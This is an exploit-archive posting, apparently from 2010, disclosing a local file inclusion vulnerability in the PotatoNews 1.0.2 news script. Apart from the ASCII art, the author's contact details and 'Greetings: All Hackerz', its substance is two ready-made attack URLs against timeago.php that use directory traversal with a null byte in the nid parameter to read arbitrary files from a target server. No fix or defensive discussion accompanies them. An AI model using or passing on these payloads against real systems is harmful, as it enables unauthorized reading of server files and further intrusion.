id: 11629
date: 04/05/2010
title: PotatoNews 1.0.2 Multiple Local File Include Vulnerability
author: Mat
cves: 

==========================================================
PotatoNews 1.0.2 Multiple Local File Include Vulnerability
==========================================================


view source
print?
        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
PotatoNews 1.0.2 Multiple Local File Include Vulnerability
Script: http://code.google.com/p/potato-news/
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)
 
//------------------------------------------------------------------+
http://[target]/[path]/newcopy/timeago.php?nid=../../../../../../../[file]%00
http://[target]/[path]/update/timeago.php?nid=../../../../../../../[file]%00
//------------------------------------------------------------------+
 
Greetings: All Hackerz



#  0day.today [2023-03-21]  #